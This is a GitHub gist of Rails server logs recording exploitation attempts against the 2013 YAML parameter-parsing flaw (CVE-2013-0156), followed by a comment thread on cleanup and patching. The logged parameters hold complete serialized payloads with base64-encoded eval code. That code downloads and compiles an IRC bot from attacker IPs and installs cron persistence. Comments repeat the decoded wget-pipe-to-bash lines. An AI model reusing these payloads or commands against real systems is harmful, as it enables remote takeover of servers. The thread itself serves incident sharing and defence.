Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[d2dldCBodHRwOi8vODguMTk4LjIwLjI0Ny9rLmMgLU8gL3RtcC9rLmM7IGdjYyAtbyAvdG1wL2sgL3RtcC9rLmM7IGNobW9kICt4IC90bXAvazsgL3RtcC9rfHx3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2sgLU8gL3RtcC9rICYmIGNobW9kICt4IC90bXAvayAmJiAvdG1wL2snKQ==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.7ms)
Rendered layouts/_social_links.html.erb (108.5ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.4ms)
Rendered layouts/_ride_request_form.html.erb (3.0ms)

from 95.138.186.181:

Started GET "/" for 95.138.186.181 at 2013-05-26 01:16:17 +0000
Processing by PagesController#show as HTML
Parameters: {"<id type"=>""yaml">", "#10"=>nil, "---"=>nil, "!ruby/object:Gem::Requirement"=>nil, "requirements:"=>nil, "- !ruby/object:Rack::Session::Abstract::SessionHash"=>nil, "env:"=>nil, "HTTP_COOKIE: "a"=>"BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgI3AXN5c3RlbSgnY3JvbnRhYiAtcjsgZWNobyAiMSAqICogKiAqIHdnZXQgLU8gLSBjb2xrb2xkdWxkLmNvbS9jbWQxfGJhc2g7d2dldCAtTyAtIGxvY2hqb2wuY29tL2NtZDJ8YmFzaDt3Z2V0ICAtTyAtIGRkb3MuY2F0LmNvbS9jbWQzfGJhc2g7Inxjcm9udGFiIC07d2dldCBodHRwOi8vODguMTk4LjIwLjI0Ny9rLmMgLU8gL3RtcC9rLmM7IGdjYyAtbyAvdG1wL2sgL3RtcC9rLmM7IGNobW9kICt4IC90bXAvazsgL3RtcC9rfHx3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2sgLU8gL3RtcC9rICYmIGNobW9kICt4IC90bXAvayAmJiAvdG1wL2snKQoKBjoGRVQ6DEBtZXRob2Q6C3Jlc3VsdA=="", "by: !ruby/object:Rack::Session::Cookie"=>nil, "coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}"=>nil, "key: a"=>nil, "secrets: "=>[nil], "exists: true"=>nil, ""=>nil, "id"=>"home"}
Rendered inline template within layouts/heavy (80.4ms)
Rendered layouts/_head.html.erb (3.4ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 03:06:59 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.2ms)
Rendered layouts/_head.html.erb (9.4ms)
Rendered layouts/_social_links.html.erb (2.9ms)
Rendered layouts/_messages.html.haml (4.3ms)
Rendered layouts/_header.html.erb (1.9ms)
Rendered layouts/_menu.html.erb (0.6ms)
Rendered layouts/_my_favs.html.haml (5.3ms)

Rendered layouts/_ride_request_form.html.erb (14.7ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:01 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.2ms)
Rendered layouts/_social_links.html.erb (1.4ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.7ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:02 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.4ms)
Rendered layouts/_head.html.erb (3.1ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:05 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (12.5ms)
Rendered layouts/_social_links.html.erb (2.3ms)
Rendered layouts/_messages.html.haml (3.3ms)
Rendered layouts/_header.html.erb (134.1ms)
Rendered layouts/_menu.html.erb (0.8ms)
Rendered layouts/_my_favs.html.haml (4.6ms)

Rendered layouts/_ride_request_form.html.erb (13.1ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:06 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.5ms)
Rendered layouts/_social_links.html.erb (1.6ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.9ms)

Rendered layouts/_ride_request_form.html.erb (4.2ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:08 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.6ms)
Rendered layouts/_head.html.erb (3.9ms)
Rendered layouts/_social_links.html.erb (1.2ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (2.9ms)

from 188.190.126.105:

Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000
Error occurred while parsing request parameters.
Contents:

Psych::SyntaxError ((): control characters are not allowed at line 1 column 1):
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:in parse' /usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:inparse_stream'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:151:in `parse'

/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'

Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.1ms)
Rendered layouts/_head.html.erb (7.1ms)
Rendered layouts/_social_links.html.erb (3.5ms)
Rendered layouts/_messages.html.haml (3.0ms)
Rendered layouts/_header.html.erb (1.6ms)
Rendered layouts/_menu.html.erb (0.7ms)
Rendered layouts/_my_favs.html.haml (4.7ms)

Rendered layouts/_ride_request_form.html.erb (15.1ms)

Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:04 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCJ3Z2V0IC1PIC92YXIvdG1wL2sgMTg4LjE5MC4xMjQuMTIwL2thaXRlbi1iaW4iKQpzeXN0ZW0oImNobW9kICt4IC92YXIvdG1wL2siKQpzeXN0ZW0oIi92YXIvdG1wL2siKQpzeXN0ZW0oJ2Nyb250YWIgLXInKQpzeXN0ZW0oJyhjcm9udGFiIC1sIDsgZWNobyAiKiAxICogKiAqIHdnZXQgLU8gL3Zhci90bXAvayAxODguMTkwLjEyNC4xMjAva2FpdGVuLWJpbiAmJiBjaG1vZCAreCAvdmFyL3RtcC9rICYmIC92YXIvdG1wL2siKSB8IGNyb250YWIgLScp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (6.0ms)
Rendered layouts/_social_links.html.erb (1.7ms)
Rendered layouts/_messages.html.haml (0.5ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.5ms)

Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:01 +0000
Error occurred while parsing request parameters.
Contents:

Psych::SyntaxError ((): control characters are not allowed at line 1 column 1):
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:in parse' /usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:inparse_stream'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:151:in `parse'

/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'

Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:02 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (9.7ms)
Rendered layouts/_social_links.html.erb (1.7ms)
Rendered layouts/_messages.html.haml (0.6ms)
Rendered layouts/_header.html.erb (1.0ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.4ms)

Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:05 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCJ3Z2V0IC1PIC92YXIvdG1wL2suYyAxODguMTkwLjEyNC4xMjAva2FpdGVuLXNyYy5jIikKc3lzdGVtKCJnY2MgLW8gL3Zhci90bXAva2EgL3Zhci90bXAvay5jIikKc3lzdGVtKCJjaG1vZCAreCAvdmFyL3RtcC9rYSIpCnN5c3RlbSgiL3Zhci90bXAva2EiKQpzeXN0ZW0oJ2Nyb250YWIgLXInKQpzeXN0ZW0oJyhjcm9udGFiIC1sIDsgZWNobyAiKiAxICogKiAqIHdnZXQgLU8gL3Zhci90bXAvay5jIDE4OC4xOTAuMTI0LjEyMC9rYWl0ZW4tc3JjLmMgJiYgZ2NjIC1vIC92YXIvdG1wL2thIC92YXIvdG1wL2suYyAmJiBjaG1vZCAreCAvdmFyL3RtcC9rYSAmJiAvdmFyL3RtcC9rYSIpIHwgY3JvbnRhYiAtJyk=].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.1ms)
Rendered layouts/_head.html.erb (155.5ms)
Rendered layouts/_social_links.html.erb (1.3ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (3.0ms)

Regards.

@Netmisa
Copy link

Netmisa commented May 27, 2013

It's one of the stable ones, sorry I can't check now.

Ruby version: 1.9.3-p327
Rails version: 3.2

@conqueringlion93
Copy link

Hi here !

I've disconnected my server until finding solution .. and I believe I have it :

chmod 700 /usr/bin/wget

=> http://forums.cpanel.net/f185/wget-abuse-hack-340232.html
this is a recent thread .. so I will test it tonight..

more search about subject, it seems to be this exploit :

http://1337day.com/exploit/20596

@conqueringlion93
Copy link

after doing the chmod on wget, I receive another log from my server :

/bin/sh: wget: Permission denied
/bin/sh: wget: Permission denied
/bin/sh: wget: Permission denied

not forget to vi /var/spool/cron/crontabs/www-data
and delete the line about wget

@conqueringlion93
Copy link

last informations,

I'm running Rails 3.2.3 with ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]

@ErneX
Copy link

ErneX commented May 27, 2013

@packetlss
Copy link

This is an exploit of an old Rails bug (CVE-2013-0156).

Clean your systems and update to 3.2.12.

In the future, make sure you subscribe to the rubyonrails-security mailing list to keep up to date with patches.

https://groups.google.com/forum/?fromgroups#!forum/rubyonrails-security

@tomfakes
Copy link

I'm building an application with will integrate with GitHub to alert you when a vulnerability is found in any of the Gems that your application uses.

For this case, you would have received an alert when the Rails vulnerabilities were found, and would then have had time to update your application before an attacker got access.

Sign up to be informed when this is ready here: http://www.rubyaudit.com

@rogerthat
Copy link

please update your rails-installation:

http://charlie.bz/blog/rails-3.2.10-remote-code-execution

@borski
Copy link

borski commented May 27, 2013

The Gem::Requirements piece makes me think its the Rails YAML parameter vulnerability from a few months ago. Even if you've updated versions, you may still be vulnerable. You can check here to see if that's the bug: https://www.tinfoilsecurity.com/railscheck

If your server has been compromised, you must rebuild from scratch - updating versions isn't enough.

@tekknolagi
Copy link

It looks like it's part of a botnet, as it's using IRC.

@dylancopeland
Copy link

@bu2, my server was hit (but not successfully exploited) yesterday by one of the listed IPs; 95.138.186.181. Rollbar.io seems to have caught it and logged it 6 times. The exact error is Hash::DisallowedType: Disallowed type attribute: "yaml".

@tadman
Copy link

tadman commented May 28, 2013

You can test for vulnerable versions in applications automatically with GemCanary which can be especially helpful if you have a large number of applications and lose track of some of them from time to time. I've found it presents the various alerts in a context that's relevant to you based on your Gemfile.lock.

@ismasan
Copy link
Author

ismasan commented May 28, 2013

Wow. I think this needs some clarification. I was not who posted it to HN. This is a rather old Rails vulnerability that has since been patched and explained. It was all over the internet back in January. I updated my apps as soon as the patches were made available and none of my servers were ever successfully attacked in this way. I just spotted the backtraces in my error logs and posted the offending code here for reference.

All the comments and discussion are appreciated but I will suggest that if you were affected by this and plan to start a discussion then use your own fork and attribution. Thanks!

@conqueringlion93
Copy link

Hi,

an what about my configuration ??

Server version: Apache/2.2.14 (Ubuntu)
Rails 3.2.3
ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]

no nginx, no rails 3.2.1, no redmine, no yalm problem, but I had the same problem detailed below :

  • k.c, k and ka files in /var/tmp (probably irc script)
  • an new line in my crontab executing some wget like this :

wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka‏

wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O -

wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k‏

I do not find any suspect trace in my apache log, but there were some actions under fail2ban ( I didn't look deep at it anymore since chmod and update www-data cron resolve my problem as describe above).

I'm still searching how the malicious scripts were upload to my server ...

@Batistleman
Copy link

Hi,

my server was infected too, should I do a reinstall? Or should removing the files and upgrading rails be enough?

@rogerthat
Copy link

my server was infected too, should I do a reinstall?

definetly

@Leglaw
Copy link

Leglaw commented May 29, 2013

@Netmisa : I've since uninstalled PhpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1.

@Netmisa
Copy link

Netmisa commented May 30, 2013

Ok, anyway we known now where the problem comes from.

@sorenwiz
Copy link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment